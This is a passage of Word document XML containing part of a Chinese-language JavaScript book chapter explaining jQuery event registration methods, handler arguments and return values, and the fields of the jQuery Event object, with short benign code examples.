                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3196086" cy="785003"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些注册方法的大部分都用于在第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章已经熟悉的常见事件类型。下面按顺序给出一</w:t>
      </w:r>
      <w:r>
        <w:t>些注意事项。</w:t>
      </w:r>
      <w:r>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>blur</w:t>
      </w:r>
      <w:r>
        <w:t>事件不支持冒泡，但</w:t>
      </w:r>
      <w:r>
        <w:t>focusin</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>focusout</w:t>
      </w:r>
      <w:r>
        <w:t>事件支持，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>确保这些事件在所有浏览器下都支持。相反地，</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>事件支持冒泡，但这经常不方便，因为很难知道鼠标是从自己感兴趣的元素中移开了，还只是从该元素的子孙元素中移开了。</w:t>
      </w:r>
      <w:r>
        <w:t>mouseenter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseleave</w:t>
      </w:r>
      <w:r>
        <w:t>是非冒泡事件，可以解决刚才的问题。这几个事件类型最初是由</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>引入的，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>确保它们可在所有浏览器下正确工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>resize</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>unload</w:t>
      </w:r>
      <w:r>
        <w:t>事件类型只在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象中触发，</w:t>
      </w:r>
      <w:r>
        <w:t>如果想要给这两个事件类型注册处理程序，应该在</w:t>
      </w:r>
      <w:r>
        <w:t>$(window)</w:t>
      </w:r>
      <w:r>
        <w:t>上调用</w:t>
      </w:r>
      <w:r>
        <w:t>resize()</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>unload()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:t>scroll()</w:t>
      </w:r>
      <w:r>
        <w:t>方法经常也用于</w:t>
      </w:r>
      <w:r>
        <w:t>$(window)</w:t>
      </w:r>
      <w:r>
        <w:t>对象上，但它也可以用在有滚动条的任何元素上（比如，当</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"scroll"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"auto"</w:t>
      </w:r>
      <w:r>
        <w:t>时）。</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可在</w:t>
      </w:r>
      <w:r>
        <w:t>$(window)</w:t>
      </w:r>
      <w:r>
        <w:t>上调用，用来给窗口注册加载事件处理程序，但经常更好的选择是，直接将初始化函数传给</w:t>
      </w:r>
      <w:r>
        <w:t>19.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>节所示的</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>。当然，还可以在</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>和图片上使用</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。注意，用不同的参数调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>loa</w:t>
      </w:r>
      <w:r>
        <w:t>d()</w:t>
      </w:r>
      <w:r>
        <w:t>还可用于加载新内容（通过脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>）到元素中</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>请阅读</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.1</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
      <w:r>
        <w:t>error()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可用在＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上，用来注册当图片加载失败时调用的处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>error()</w:t>
      </w:r>
      <w:r>
        <w:t>不应该用于设置</w:t>
      </w:r>
      <w:r>
        <w:t>14.6</w:t>
      </w:r>
      <w:r>
        <w:t>节描述的窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了这些简单的事件注册方法外，还有两个特殊形式的方法，有时很有用。</w:t>
      </w:r>
      <w:r>
        <w:t>hover()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来给</w:t>
      </w:r>
      <w:r>
        <w:t>mouseenter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseleave</w:t>
      </w:r>
      <w:r>
        <w:t>事件注册处理程序。调用</w:t>
      </w:r>
      <w:r>
        <w:t>hover(f,g)</w:t>
      </w:r>
      <w:r>
        <w:t>就和调用</w:t>
      </w:r>
      <w:r>
        <w:t>mouseenter(f)</w:t>
      </w:r>
      <w:r>
        <w:t>然后调用</w:t>
      </w:r>
      <w:r>
        <w:t>mouseleave(g)</w:t>
      </w:r>
      <w:r>
        <w:t>一样。如果仅传入一个参数给</w:t>
      </w:r>
      <w:r>
        <w:t>hover</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>，该参数函数会同时用做</w:t>
      </w:r>
      <w:r>
        <w:t>enter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>leave</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另一个特殊的事件注册方法是</w:t>
      </w:r>
      <w:r>
        <w:t>toggle()</w:t>
      </w:r>
      <w:r>
        <w:t>。该方法将事件处理程序函数绑定到单击事件。可指定两个或多个处理程序函数，当单击事件发生时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>每次会调用一个处理程序函数。例如，如果调用</w:t>
      </w:r>
      <w:r>
        <w:t>toggle(f,g,h)</w:t>
      </w:r>
      <w:r>
        <w:t>，第一次单击事件触发时，会调用函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>，第二</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>次会调用</w:t>
      </w:r>
      <w:r>
        <w:t>g()</w:t>
      </w:r>
      <w:r>
        <w:t>，第三次则调用</w:t>
      </w:r>
      <w:r>
        <w:t>h()</w:t>
      </w:r>
      <w:r>
        <w:t>，然后调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>来处理第四次单击事件。小心使用</w:t>
      </w:r>
      <w:r>
        <w:t>toggle()</w:t>
      </w:r>
      <w:r>
        <w:t>：我们将在</w:t>
      </w:r>
      <w:r>
        <w:t>19.5.1</w:t>
      </w:r>
      <w:r>
        <w:t>节看到，该方法可用来显示或隐藏选中元素（也就是说，切换选中元素的可见性</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>19.4.4</w:t>
      </w:r>
      <w:r>
        <w:t>节中，我们会学到其他更通用的方式来注册事件处理程序，本节最后，让我们再学会一个更简单且更便捷的处理程序注册方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>回忆下，可以传递</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来创建该字符串所描述的元素，还可传入一个对象（当做第二个参数），该对象由属性组成，这些属性可设置到新创建的元素上。这第二个参数可以是传递给</w:t>
      </w:r>
      <w:r>
        <w:t>attr()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的任意对象。此外，如果这些属性中有任何一个与上面列举的事件注册方法同名，该属性值会被当做处理程序函数，并注册为命名事件类型的处理程序。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>img/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>",{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>src:image_url,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alt:image_description,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>className:"translucent_image",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>click:function(){$(this).css("opacity","50%");}</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80" w:name="19_4_2_jQueryShi_Jian_Chu_Li_Cheng_Xu_"/>
      <w:r>
        <w:t>19.4.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="480"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>上面例子中的事件处理程序函数被当做是不带参数以及不返回值的。像这样书写事件处理程序非常正常，但</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>调用每一个事件处理程序时的确传入了一个或多个参数，并且对处理程序的返回值进行了处理。需要知道的最重要的一件事情是，每个事件</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序都传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象作为第一个参数。该对象的字段提供了与该事件相关的详细信息（比如鼠标指针的坐标）。标准事件对象的属性在第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章描述过。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>模拟标准</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象，即便在不支持的标准事件对象的浏览器中（像</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及其以下），</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象在所有浏览器上拥有一组相同的字段。这在</w:t>
      </w:r>
      <w:r>
        <w:t>19.4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节会详细讲述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常，调用事件处理程序时只带有事件对象这个唯一参数。如果用</w:t>
      </w:r>
      <w:r>
        <w:t>trigger()</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.4.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）显式触发事件，可以传入额外的参数数组。这样做时，这些参数会在第一个事件对象参数之</w:t>
      </w:r>
      <w:r>
        <w:t>后传递给事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不管它们是如何注册的，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序函数的返回值始终有意义。如果处理程序返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，与该事件相关联的默认行为，以及该事件接来下的冒泡都会被取消。也就是说，返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>等同于调用</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefault()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。同样，当事件处理程序返回一个值（非</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值）时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>会将该值存储在</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性中，该属性可以被后续调用的事件处理程序访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="481" w:name="19_4_3_jQueryShi_Jian_Dui_Xiang_"/>
      <w:r>
        <w:t>19.4.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>通过定义自己的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象来隐藏浏览器之间的实现差异。当一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序被调用时，总会传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象作为其第一个参数。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象主要以</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>标准为基准，同时它也实现了一些实际的事件标准。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会将以下所有字段从原生</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象中复制到</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象上（尽管对于特定事件类型来说，有些字段值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251705344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3450566" cy="944592"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="46" name="00046.jpeg" descr="000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00046.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3450566" cy="944592"/>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06368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3286664" cy="271732"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="47" name="00047.jpeg" descr="000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00047.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3286664" cy="271732"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了这些属性，</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义了以下方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3109822" cy="422694"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="48" name="00048.jpeg" descr="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00048.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3109822" cy="422694"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些事件属性和方法中的大部分在第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍过，并在第四部分的</w:t>
      </w:r>
      <w:r>
        <w:t>ref-Event</w:t>
      </w:r>
      <w:r>
        <w:t>中有详细文档说明。对于一部分字段，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>做了特殊处理，使其在所有浏览器中的行为一致，值得我们留意：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>metaKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果原生事件对象没有</w:t>
      </w:r>
      <w:r>
        <w:t>metaKey</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会使其与</w:t>
      </w:r>
      <w:r>
        <w:t>ctrlKey</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值一样。在</w:t>
      </w:r>
      <w:r>
        <w:t>Mac OS</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:t>键设置</w:t>
      </w:r>
      <w:r>
        <w:t>meta</w:t>
      </w:r>
      <w:r>
        <w:t>键的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>pageX,pageY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果原生事件对象没有定义这两个属性，但定义了鼠标指针的视口坐标</w:t>
      </w:r>
      <w:r>
        <w:t>clientX</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientY</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会计算出鼠标指针的文档坐标并把它们存储在</w:t>
      </w:r>
      <w:r>
        <w:t>pageX</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pageY</w:t>
      </w:r>
      <w:r>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>target,current</w:t>
      </w:r>
      <w:r>
        <w:t>Target,relatedTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性表示在其上发生事件的文档元素。如果原生事件对象的目标是文本节点，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>返回的目标会替换为包含该文本节点的元素。</w:t>
      </w:r>
      <w:r>
        <w:t>currentTarget</w:t>
      </w:r>
      <w:r>
        <w:t>是当前正在执行的事件处理程序所注册的元素，与</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>应该始终一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>currentTarget</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>不一样，那么正在处理的事件是从触发它的元素冒泡上来的，此时使用</w:t>
      </w:r>
      <w:r>
        <w:t>is()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）来检测</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>元素可能会很有用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if($(event.target).is("a"))retur</w:t>
      </w:r>
      <w:r>
        <w:t>n;//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略在链接上启动的事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
